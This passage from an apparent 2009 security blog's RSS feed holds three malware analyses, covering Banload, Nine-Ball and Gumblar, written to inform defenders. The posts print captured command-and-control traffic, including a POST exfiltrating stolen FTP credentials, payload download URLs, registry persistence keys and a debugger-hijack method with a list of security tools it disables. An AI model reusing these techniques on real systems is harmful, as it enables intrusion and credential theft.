<col style="width: 191pt;" width="255"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt; width: 116pt;" width="154" height="17">hotlinkfiles.com</td>
<td style="width: 191pt;" width="255">/files/2607508_gs2zp/eudenoite1.scr</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17">premium.hotlinkfiles.com</td>
<td>/files/2619000_idqqh/fotosanexadas.scryh</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17">hotlinkfiles.com</td>
<td>/files/2637460_lnqnl/DSC_804.jpg.scr</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17">premium.hotlinkfiles.com</td>
<td>/files/2645684_c2awa/fotosanexadas.scr</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17">hotlinkfiles.com</td>
<td>/files/2645758_i45ka/DSC_805.jpg.scr</td>
</tr>
</tbody>
</table>
<p>Notice the use of premium.hotlinkfiles.com? This means the attacker has either bought an account or has used a account stolen from an unsuspecting victim.</p>
<p>Detection for the first stage download is pretty good at 30/41, most vendors detect it as Banload which is also classed as a banking trojan. <a title="banload variant" href="http://www.virustotal.com/analisis/9af80939bdd78d377e02676795cbad43033b5015f6014500beaa3bb75de58038-1246565040" target="_blank">[Virustotal1]</a> <a title="banload malware" href="http://www.virustotal.com/analisis/3727d32d8d98d1ef78bb6b4537aa3cb35071fb255d3246881bfb8c0a22c0b6c6-1246565055" target="_blank">[Virustotal2]</a></p>
<p>Downloader.Banload.AMIX<br />
Win-Trojan/Banload.71680.O<br />
Win32/TrojanDownloader.Banload.BDA</p>
<p>PWS-Banker!ee<br />
Mal_Banker</p>
<p>The file downloads several more payloads which are all executables <a title="Threat Expert Banload" href="http://www.threatexpert.com/report.aspx?md5=cee657747902a498f438d1b402b31619" target="_blank">[Threatexpert]</a> however the detection rate is terrible on them with most being detected by 0/41 vendors. <a href="http://www.virustotal.com/analisis/76d6a837b503eeabdf39abe385ee57bb0a91c80939cd481373c8488c49eb7648-1246566431" target="_blank">[Virustotal]</a></p>
<p>hxxp://gay24x01.hpg.ig.com.br/ree1.html<br />
hxxp://gay24x01.hpg.ig.com.br/ree2.html<br />
hxxp://gay24x02.hpg.ig.com.br/nl2.html<br />
hxxp://gay24x02.hpg.ig.com.br/nl3.html<br />
hxxp://gay24x02.hpg.ig.com.br/nl4.html<br />
hxxp://gay24x02.hpg.ig.com.br/nl5.html<br />
hxxp://gay24x02.hpg.ig.com.br/nl6.html<br />
hxxp://gay24x02.hpg.ig.com.br/nl7.html</p>
<p>So what does this mean? Since sites like hotlinkfiles.com are perfectly legitimate, web content filtering will not block them. The second stage URL can still be blocked, however it can change and analysis must be performed before the second stage URL can be found. In a corporate environment, you may want to consider blocking these file transfer services if they are not needed.</p>
<p>As for where this attack came from, it was delivered via SPAM with a subject line of &#8220;fotos [date]&#8221; and is written in Portuguese. The text reads &#8220;These photos are very funny&#8221;.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/fotos-malware.jpg"><img class="alignnone size-medium wp-image-346" title="Portuguese SPAM with malware" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/fotos-malware-300x195.jpg" alt="Portuguese SPAM with malware" width="300" height="195" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/07/02/one-click-hosting-spreads-banking-trojan/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Nine-Ball = Gumblar Redux? &#8211; 40,000 websites compromised</title>
		<link>http://www.martinsecurity.net/2009/06/16/nine-ball-gumblar-redux-40000-websites-compromised/</link>
		<comments>http://www.martinsecurity.net/2009/06/16/nine-ball-gumblar-redux-40000-websites-compromised/#comments</comments>
		<pubDate>Wed, 17 Jun 2009 03:24:53 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[fake antivirus]]></category>
		<category><![CDATA[fake av]]></category>
		<category><![CDATA[gumblar]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[nine-ball]]></category>
		<category><![CDATA[ninetorack.in]]></category>
		<category><![CDATA[rnw.kz]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=326</guid>
		<description><![CDATA[My RSS reader alerted me today to another wave of mass website compromises from Web Sense. Hungry for more information I decided to dig in to reveal the details that, as always, have been left out. Summary This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and [...]]]></description>
			<content:encoded><![CDATA[<p>My RSS reader alerted me today to another wave of mass website compromises from <a title="Nine-Ball Websense" href="http://securitylabs.websense.com/content/Alerts/3421.aspx" target="_blank">Web Sense</a>. Hungry for more information I decided to dig in to reveal the details that, as always, have been left out.</p>
<p><strong>Summary</strong></p>
<p>This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and the end result are very similar. The objective of the attack is to:</p>
<p>Install a socks proxy<br />
Install fake AV (System Security)<br />
Steal FTP credentials<br />
Send SPAM<br />
Redirect search queries</p>
<p>What&#8217;s new? The attackers use updated and more stealthy code. They also introduce a component which fiddles with Terminal Services (RDP) although I&#8217;m not 100% sure why yet.</p>
<p><strong>Details</strong></p>
<p>Information on Websense&#8217;s site was sparse, but a quick google search for the first part of the domain they referenced in their alert yeilded the information I needed. The initial attack was coming from rnw.kz/index.php. This domain is on 91.212.65.133 which is hosted by Eurohost out of the Ukraine which I have run across many times before. I&#8217;ll probably post another article on these guys shortly.</p>
<p><tt>inetnum:        91.212.65.0 - 91.212.65.255<br />
netname:        EUROHOST-NET<br />
descr:          Eurohost LLC<br />
descr:          Provider Local Registry<br />
country:        UA</tt></p>
<p>This IP hosts many <a href="http://www.robtex.com/ip/91.212.65.133.html" target="_blank">other domains</a> associated with the attack:</p>
<p>sovi.tw<br />
rmi.tw<br />
orep.tw<br />
molo.tw<br />
dmr.tw</p>
<p>When connecting to rnw.kz, a series of redirects take place between the above noted domains. Cookies are created (probably so a victim is only infected once) to track victims and are passed onto the next domain. If the user has already visited the site, they are sent on to ask.com. The mighty wepawet was not sucessful in analysing the attack as it pointed me to ask.com <img src='http://www.martinsecurity.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p>After using MalZilla to quickly decode the exploit code (discussed in WebSense&#8217;s Alert), the final payload was evident and resides at: http://orep.tw/pve/pics.php?id=[unique id] <a href="http://www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245193759" target="_blank">[VirusTotal]</a> <a title="nine ball threat expert" href="http://www.threatexpert.com/report.aspx?md5=32b7671aab9a5b8cf17d8eeb0993a266" target="_blank">[Threat Expert]</a>.</p>
<p>A VM of mine was infected and after loading internet explorer the malware lit up and did it&#8217;s thing. I&#8217;ve submitted a few files to VT but to be honest I haven&#8217;t had to much time to investigate to cover everything.</p>
<p><a href="http://www.virustotal.com/analisis/85d86e234c2b4ae30cf7e1a74f2e5ced29ad95dafd48cc7f7b4b4db9ff71870f-1245206431" target="_blank">Virustotal 1</a></p>
<p><a href="http://www.virustotal.com/analisis/e8294fe1c4a1a129278b2f65b490a312cb6834b2e8d1df9bd296550d35a485df-1245203711" target="_blank">Virustotal 2</a></p>
<p><strong>Binary Downloads, Ads and C&amp;C communication</strong></p>
<p>Interesting notes:</p>
<p>User Agent: socks<br />
HTTP server: nginx (commonly used by attackers)<br />
C&amp;C appears to be: trafficshop.tw<br />
Version: 3.15.3<br />
Some of the attacker&#8217;s SQL is visable: UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;</p>
<p>GET /zub/zc.php?l=US&amp;d=0A91D4B2BEDE419DAD002CB5AF39B158&amp;v=3.15.3&amp;sft=AAAAAAAAA&amp;rvz1=41&amp;rvz2=0002786062 HTTP/1.1</p>
<p>Host: trafficshop.tw<br />
HTTP/1.1 200 OK<br />
Date: Wed, 17 Jun 2009 00:25:41 GMT<br />
Server: Apache/2<br />
X-Powered-By: PHP/5.2.9<br />
Vary: Accept-Encoding,User-Agent<br />
Content-Length: 1822<br />
Content-Type: text/html</p>
<p>#U1:http://orep.tw/socks.exe<br />
#U1:http://orep.tw/sever.exe<br />
#U1:http://orep.tw/ic.exe<br />
#U;:&lt;br&gt;|ADVERTISING|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;|&lt;a href=&#8221;http://www.best-med-shop.com&#8221;&gt;   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   &lt;br&gt;|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    &lt;br&gt;|flawless customer support. New discounts and special offers !       &lt;br&gt;|&lt;/a&gt;|http://www.best-med-shop.com|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;%%<br />
#U7:&lt;br&gt;|ADVERTISING|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;|&lt;a href=&#8221;http://www.best-med-shop.com&#8221;&gt;   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   &lt;br&gt;|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    &lt;br&gt;|flawless customer support. New discounts and special offers !       &lt;br&gt;|&lt;/a&gt;|http://www.best-med-shop.com|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;%%<br />
#U?:&lt;br&gt;|ADVERTISING|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;|&lt;a href=&#8221;http://www.best-med-shop.com&#8221;&gt;   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   &lt;br&gt;|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    &lt;br&gt;|flawless customer support. New discounts and special offers !       &lt;br&gt;|&lt;/a&gt;|http://www.best-med-shop.com|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;%%<br />
#U=:FORUM ADVERTISING|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;||[URL=http://www.best-med-shop.com]  ||Canadian medicine and pharmacy is most professional. Generic pills. High qulity and lowest price.||Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa&#8230;. [/url]|||http://www.best-med-shop.com||&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;%%</p>
<p>GET /zub/zc.php?l=US&amp;d=0A91D4B2BEDE419DAD002CB5AF39B158&amp;v=3.15.3&amp;k=200704_socks.exe,432128_sever.exe,11264_ic.exe HTTP/1.1</p>
<p>Host: trafficshop.tw<br />
HTTP/1.1 200 OK<br />
Date: Wed, 17 Jun 2009 00:26:01 GMT<br />
Server: Apache/2<br />
X-Powered-By: PHP/5.2.9<br />
Vary: Accept-Encoding,User-Agent<br />
Content-Length: 251<br />
Content-Type: text/html</p>
<p>#U1:http://orep.tw/socks.exe<br />
#U1:http://orep.tw/sever.exe<br />
#U1:http://orep.tw/ic.exe<br />
Array<br />
(<br />
[0] =&gt; 200704_socks.exe<br />
[1] =&gt; 432128_sever.exe<br />
[2] =&gt; 11264_ic.exe<br />
)<br />
UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;<br />
.crc tmpl.</p>
<p>GET /n1.exe HTTP/1.1<br />
User-Agent: Mozilla<br />
Host: miosmschat.com</p>
<p>HTTP/1.1 200 OK<br />
Server: nginx/0.7.59<br />
Date: Tue, 16 Jun 2009 23:34:57 GMT<br />
Content-Type: application/octet-stream<br />
Connection: close<br />
Content-Length: 512830<br />
Last-Modified: Tue, 16 Jun 2009 23:30:01 GMT<br />
Accept-Ranges: bytes</p>
<p><strong>Other interesting network traffic</strong></p>
<p>GET /in.php?url=5&amp;affid=02800 HTTP/1.1<br />
Referrer: http://greatmarketingservices.com/<br />
Accept: *//*<br />
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows XP)<br />
Host: greatmarketingservices.com<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache</p>
<p>POST /socks/gate/r.php HTTP/1.1<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: socks<br />
Host: trafficshop.tw<br />
Content-Length: 125<br />
Cache-Control: no-cache</p>
<p>s=0002804890612064add4936a533bbafe4f66456af0d214d0d8b7025665dbbcb84b1ff54d03fecq0d16129l0t1q1d2817l0t1q3d11521l0t1q9d7937l0t1HTTP/1.1 200 OK</p>
<p>Date: Wed, 17 Jun 2009 00:26:01 GMT<br />
Server: Apache/2<br />
X-Powered-By: PHP/5.2.9<br />
Vary: Accept-Encoding,User-Agent<br />
Content-Length: 29<br />
Content-Type: text/html</p>
<p>iogeelhchqhogmhgggdccnghdqdk</p>
<p>POST /socks/gate/data.php HTTP/1.1<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: socks<br />
Host: trafficshop.tw<br />
Content-Length: 78<br />
Cache-Control: no-cache</p>
<p>CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460&#8230;ya.ru/5/982HTTP/1.1 200 OK</p>
<p>Date: Wed, 17 Jun 2009 00:26:04 GMT<br />
Server: Apache/2<br />
X-Powered-By: PHP/5.2.9<br />
Vary: Accept-Encoding,User-Agent<br />
Content-Length: 0<br />
Content-Type: text/html</p>
<p>POST /socks/gate/data.php HTTP/1.1<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: socks<br />
Host: trafficshop.tw<br />
Content-Length: 93<br />
Cache-Control: no-cache</p>
<p>CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460&#8230;AAAAAAAACI.050010026000300HTTP/1.1 200 OK</p>
<p>Date: Wed, 17 Jun 2009 00:26:04 GMT<br />
Server: Apache/2<br />
X-Powered-By: PHP/5.2.9<br />
Vary: Accept-Encoding,User-Agent<br />
Content-Length: 50<br />
Content-Type: text/html</p>
<p><strong>Files &amp; Reg Keys</strong></p>
<p>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: &#8220;C:\WINDOWS\sever.exe&#8221;<br />
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18888124: &#8220;C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe&#8221;<br />
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\98898116: &#8220;C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe&#8221;<br />
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appiytt_Dlls: &#8220;nvbms&#8221;<br />
HKLM\SOFTWARE\Classes\CLSID\{425882B0-B0BF-11CE-B59F-00AA006CB37D}\InProcServer32\: &#8220;C:\WINDOWS\system32\npp\ndisnpp.dll&#8221;</p>
<p>C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe (fake av)<br />
C:\Documents and Settings\All Users\Application Data\18888124\18888124.glu (fake av)<br />
C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe (fake av)<br />
C:\Documents and Settings\All Users\Application Data\98898116.ini (fake av)<br />
C:\Documents and Settings\user\Local Settings\Temp\izohore.bmp (fake av)<br />
C:\Documents and Settings\user\Local Settings\Temp\TMP46.tmpC:\WINDOWS\system32\4311z.sc<br />
C:\WINDOWS\system32\cxilanls<br />
C:\WINDOWS\system32\nh4g.bbv<br />
C:\WINDOWS\system32\nvbms.dll<br />
C:\WINDOWS\system32\sfxzmtforum.dll (best-med-shop.com advertising)<br />
C:\WINDOWS\system32\sfxzmtsmt.dll (best-med-shop.com advertising)<br />
C:\WINDOWS\system32\sfxzmtsmtspm.dll (best-med-shop.com advertising)<br />
C:\WINDOWS\system32\sfxzmtwbmail.dll (best-med-shop.com advertising)<br />
C:\WINDOWS\system32\sgr3.ge<br />
C:\WINDOWS\system32\SOCKET2.DLL<br />
C:\WINDOWS\system32\SOCKET2w.DLL<br />
C:\WINDOWS\system32\SPORDER.DLL<br />
C:\WINDOWS\system32\user32.DLL<br />
C:\WINDOWS\system32\vrur<br />
C:\WINDOWS\sever.exe<br />
C:\WINDOWS\socks.exe (socks proxy)</p>
<p><strong>Other notable behavior</strong></p>
<p>The malware tries to overwrite user32.dll, triggering windows file protection. My VM bluescreened a couple times during analysis which means victims are probably suffering the same problem. The malware also installs winpcap and hides it&#8217;s presence by deleting various reg keys and the winpcap uninstaller.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/06/16/nine-ball-gumblar-redux-40000-websites-compromised/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Inside the Massive Gumblar Attack</title>
		<link>http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/</link>
		<comments>http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/#comments</comments>
		<pubDate>Thu, 21 May 2009 04:08:15 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[botnet]]></category>
		<category><![CDATA[fake av]]></category>
		<category><![CDATA[geno]]></category>
		<category><![CDATA[gumblar]]></category>
		<category><![CDATA[hijack]]></category>
		<category><![CDATA[information stealing]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[martuz]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=283</guid>
		<description><![CDATA[I first found out about Gumblar a couple days ago via one of Scan Safe&#8217;s blog posts. Responsible for 42% of &#8220;all malicious infections found on websites&#8221; (Sophos) during a 7 day period, Gumblar (JSRedir-R)  has been extremely effective at propagating. Many bloggers have been focusing on the script involved in the attack, not so [...]]]></description>
			<content:encoded><![CDATA[<p>I first found out about Gumblar a couple days ago via one of Scan Safe&#8217;s <a title="ScanSafe Blog" href="http://blog.scansafe.com" target="_blank">blog posts</a>. Responsible for 42% of &#8220;all malicious infections found on websites&#8221; (<a href="http://www.sophos.com/blogs/gc/g/2009/05/14/malicious-jsredir-javascript-biggest-malware-threat-web/" target="_blank">Sophos</a>) during a 7 day period, Gumblar (JSRedir-R)  has been extremely effective at propagating. Many bloggers have been focusing on the script involved in the attack, not so much on what happens when a client is compromised. I will attempt to cover this portion of the attack in detail.</p>
<p><strong>Summary</strong></p>
<p>Once compromised by the Gumblar / Martuz / Geno attack, victims will have many pieces of malware loaded onto their machines, this malware does the following:</p>
<p>Steals FTP credentials<br />
Sends SPAM<br />
Installs fake anti virus<br />
Highjacks Google search queries<br />
Disables security software</p>
<p>The exploits used are for Adobe Acrobat and Adobe Flash Player.</p>
<p>Some further reading:</p>
<p><a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/" target="_blank">unmaskparasites</a><br />
<a href="http://www.dynamoo.com/blog/2009/05/martuzcn-injection-attack.html" target="_blank">dynamoo</a></p>
<p><strong>FTP credential stealing</strong></p>
<p>While observing the bot in my lab the first thing that indicated the ability to steal credentials was the bot trying to put my network card into promiscuous mode. I then logged into ftp.mozilla.org as anonymous and sure enough my credentials were ex filtrated in an encoded format.</p>
<p>POST /good/receiver/ftp HTTP/1.1<br />
Host: 78.109.29.114<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 99</p>
<p><strong>ftp_uri_0</strong>=9ObqyMjmQWwGxvOwcOfhoJ%2BClWBtBM2kvnD%2F0qzByfsUN0eauuUxo6GiyNX4&amp;ftp_source_0=xuD7lIGgQw</p>
<p>Doing a little recon, we can see the attacker is using &#8220;Capture Manager v1.0&#8243;, a purchase which seems to be really paying off for them</p>
<div id="attachment_284" class="wp-caption alignnone" style="width: 310px"><a href="http://www.martinsecurity.net/wp-content/uploads/2009/05/capture.jpg"><img class="size-medium wp-image-284" title="Capture Manager v1.0" src="http://www.martinsecurity.net/wp-content/uploads/2009/05/capture-300x185.jpg" alt="Capture Manager" width="300" height="185" /></a><p class="wp-caption-text">Capture Manager</p></div>
<p>As mentioned earlier, the malware downloads software to sniff network traffic, winpcap. With the network card in promiscuous mode, the attacker can then capture other FTP credentials from machines on the same subnet.</p>
<p>An entry is made in the registry for winpcap: HKLM\SOFTWARE\WinPcap</p>
<p><strong>SPAM</strong></p>
<p>The first time I infected myself with the malware, a SPAM bot was installed that had communication that looked like Pushdo. However the second time I infected myself the malware exhibited different behavior and did not send the same traffic. My firewall still recorded drops on port 25, so the malware authors must be deploying a different SPAM engine now. I have not had a chance to investigate this portion of the attack any further.</p>
<p><strong>Fake Antivirus</strong></p>
<p>As with so many attacks as of late, fake anti virus is also installed on the affected machines. In this case it is &#8220;System Security 2009&#8243;, screenshots below.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/05/av3.jpg"><img class="alignnone size-medium wp-image-292" title="av3" src="http://www.martinsecurity.net/wp-content/uploads/2009/05/av3-300x60.jpg" alt="av3" width="300" height="60" /></a></p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/05/av22.jpg"><img class="alignnone size-medium wp-image-293" title="av22" src="http://www.martinsecurity.net/wp-content/uploads/2009/05/av22-300x217.jpg" alt="av22" width="300" height="217" /></a></p>
<p>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SystemSecurity2009</p>
<p><strong>Search Hijacking</strong></p>
<p>The next portion of the attack involves hijacking google search results. The malware installs a proxy on port 7171 which then redirects searches. When a user searches for something, the malware will send the user to a page of it&#8217;s choosing filled with bogus search results. Here is an example of what you get after clicking a google search result for &#8220;car&#8221;.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/05/car1.jpg"><img class="alignnone size-medium wp-image-294" title="car1" src="http://www.martinsecurity.net/wp-content/uploads/2009/05/car1-300x225.jpg" alt="car1" width="300" height="225" /></a></p>
<p>Sys32dll.exe contains the proxy which has a firewall bypass rule added as well. Also note that a rule is added for port 80.</p>
<p>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer: &#8220;http=localhost:7171&#8243;<br />
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: &#8220;80:TCP:*:Enabled:SYS32DLL&#8221;<br />
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7171:TCP: &#8220;7171:TCP:*:Enabled:SYS32DLL&#8221;</p>
<p><strong>Disable Security Software</strong></p>
<p>In order to keep itself running and make life more difficult for both analysts and users, the malware disables many security and administrative tools by sending them to the windows system debugger. Here is an example:</p>
<p>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe\Debugger: &#8220;ntsd -d&#8221;</p>
<p>And here is a list of all the blocked applications:</p>
<p>a2service.exe<br />
ArcaCheck.exe<br />
arcavir.exe<br />
ashDisp.exe<br />
ashEnhcd.exe<br />
ashServ.exe<br />
ashUpd.exe<br />
aswUpdSv.exe<br />
autoruns.exe<br />
avadmin.exe<br />
avcenter.exe<br />
avcls.exe<br />
avconfig.exe<br />
avconsol.exe<br />
avgnt.exe<br />
avgrssvc.exe<br />
avguard.exe<br />
AvMonitor.exe<br />
avp.com<br />
avp.exe<br />
AVP32.EXE<br />
avscan.exe<br />
avz.exe<br />
avz4.exe<br />
avz_se.exe<br />
bdagent.exe<br />
bdinit.exe<br />
caav.exe<br />
caavguiscan.exe<br />
casecuritycenter.exe<br />
CCenter.exe<br />
ccupdate.exe<br />
cfp.exe<br />
cfpupdat.exe<br />
cmdagent.exe<br />
drwadins.exe<br />
DRWEB32.EXE<br />
drwebupw.exe<br />
ekrn.exe<br />
FAMEH32.EXE<br />
filemon.exe<br />
FPAVServer.exe<br />
fpscan.exe<br />
FPWin.exe<br />
fsav32.exe<br />
fsgk32st.exe<br />
FSMA32.EXE<br />
GFRing3.exe<br />
guardgui.exe<br />
guardxservice.exe<br />
guardxup.exe<br />
HijackThis.exe<br />
KASMain.exe<br />
KASTask.exe<br />
KAV32.exe<br />
KAVDX.exe<br />
KAVPF.exe<br />
KAVPFW.exe<br />
KAVStart.exe<br />
KPFW32.exe<br />
KPFW32X.exe<br />
Navapsvc.exe<br />
Navapw32.exe<br />
navigator.exe<br />
NAVNT.EXE<br />
NAVSTUB.EXE<br />
NAVW32.EXE<br />
NAVWNT.EXE<br />
niu.exe<br />
nod32.exe<br />
nod32krn.exe<br />
Nvcc.exe<br />
OllyDBG.EXE<br />
outpost.exe<br />
preupd.exe<br />
procexp.exe<br />
pskdr.exe<br />
regedit.exe<br />
regmon.exe<br />
RegTool.exe<br />
scan32.exe<br />
SfFnUp.exe<br />
Vba32arkit.exe<br />
vba32ldr.exe<br />
vsserv.exe<br />
Zanda.exe<br />
zapro.exe<br />
Zlh.exe<br />
zonealarm.exe<br />
zoneband.dll</p>
<p><strong>Domains </strong></p>
<p>Since both gumblar.cn and martuz.cn are down as of this writing, I will discuss the secondary domains involved in the attack. These are the domains that actually host the malware and exploits and listen on port 8080 so they may seem offline if you try connecting directly.</p>
<p>autobestwestern.cn<br />
bestlotron.cn<br />
betbigwager.cn<br />
denverfilmdigitalmedia.cn<br />
educationbigtop.cn<br />
filmtypemedia.cn<br />
finditbig.cn<br />
greatbethere.cn<br />
hotslotpot.cn<br />
liteautotop.cn<br />
litebest.cn<br />
litegreatestdirect.cn<br />
litetopdetect.cn<br />
lotbetsite.cn<br />
lotwageronline.cn<br />
mediahomenamemartvideo.cn<br />
nameashop.cn<br />
perfectnamestore.cn<br />
playbetwager.cn<br />
bestfindaloan.cn<br />
finditbig.cn<br />
litetopdetect.cn<br />
litetopfindworld.cn<br />
lotwageronline.cn<br />
nanotopdiscover.cn<br />
torrentoreactor.net<br />
bestfindaloan.cn<br />
finditbig.cn<br />
litegreatestdirect.cn<br />
lotwageronline.cn</p>
<p>These are additional domains involved in the attack:</p>
<p>nua20090515.com &#8211; C&amp;C<br />
i-site.ph &#8211; binary download<br />
zz-dns.com &#8211; additional C&amp;C?<br />
main15052009.com &#8211; fake av related?<br />
besthandycap.com<br />
ya.ru<br />
&#8230;and many more&#8230;</p>
<p><strong>Other Information</strong></p>
<p>Malware startup</p>
<p>1) HKLM\SYSTEM\ControlSet001\Services\VSSMSDTC\ImagePath: &#8220;C:\WINDOWS\system32\asferrort.exe srv&#8221;<br />
2) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: &#8220;C:\WINDOWS\Temp\wpv701242765100.exe&#8221;<br />
3) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pp: &#8220;c:\windows\pp10.exe&#8221; (I also saw pp08.exe, so this name is variable)<br />
4) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\12281714: &#8220;C:\Documents and Settings\All Users\Application Data\12281714\12281714.exe&#8221;<br />
5) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\92291706: &#8220;C:\Documents and Settings\All Users\Application Data\92291706\92291706.exe&#8221;<br />
6) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray: &#8220;c:\windows\ld08.exe&#8221;</p>
<p>An additional security provider is also installed in the form of digiwet.dll, I have not investigated this piece of the attack.</p>
<p>HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SecurityProviders: &#8220;msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll&#8221;</p>
<p>A BHO (browser helper object) is also installed here:</p>
<p>HKLM\SOFTWARE\Classes\CLSID\{31F57AFD-3989-4A5B-A33E-6B6253DF8DD4}\InprocServer32\: &#8220;C:\WINDOWS\system32\547372\547372.dll&#8221;</p>
<p>One of the pieces of malware (ld08.exe) also hooks several APIs:</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/05/hooks.jpg"><img class="alignnone size-medium wp-image-297" title="hooks" src="http://www.martinsecurity.net/wp-content/uploads/2009/05/hooks-300x241.jpg" alt="hooks" width="300" height="241" /></a></p>
<p><strong>C&amp;C communication </strong></p>
<p>The magic number field below may be a key to encode the further communication to hamper analysis.</p>
<p>GET /new/controller.php?action=bot&amp;entity_list=&amp;uid=1&amp;first=1&amp;guid=953988293&amp;rnd=981633 HTTP/1.1</p>
<p>Host: 78.109.29.112<br />
HTTP/1.1 200 OK<br />
Server: nginx<br />
Date: Wed, 20 May 2009 19:58:49 GMT<br />
Content-Type: text/html; charset=utf-8<br />
Connection: close<br />
X-Powered-By: PHP/5.1.6<br />
Version: 1<br />
Content-Length: 581632<br />
Entity-Info: 1241292389:50176:2;1241530597:32768:1;1241643870:41984:1;1242216620:28672:2;1242765100:428032:2;</p>
<p>Rnd: 982147<br />
